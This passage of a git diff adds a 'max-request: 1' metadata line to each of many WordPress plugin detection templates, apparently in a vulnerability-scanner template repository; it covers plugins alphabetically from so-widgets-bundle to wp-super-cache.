     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
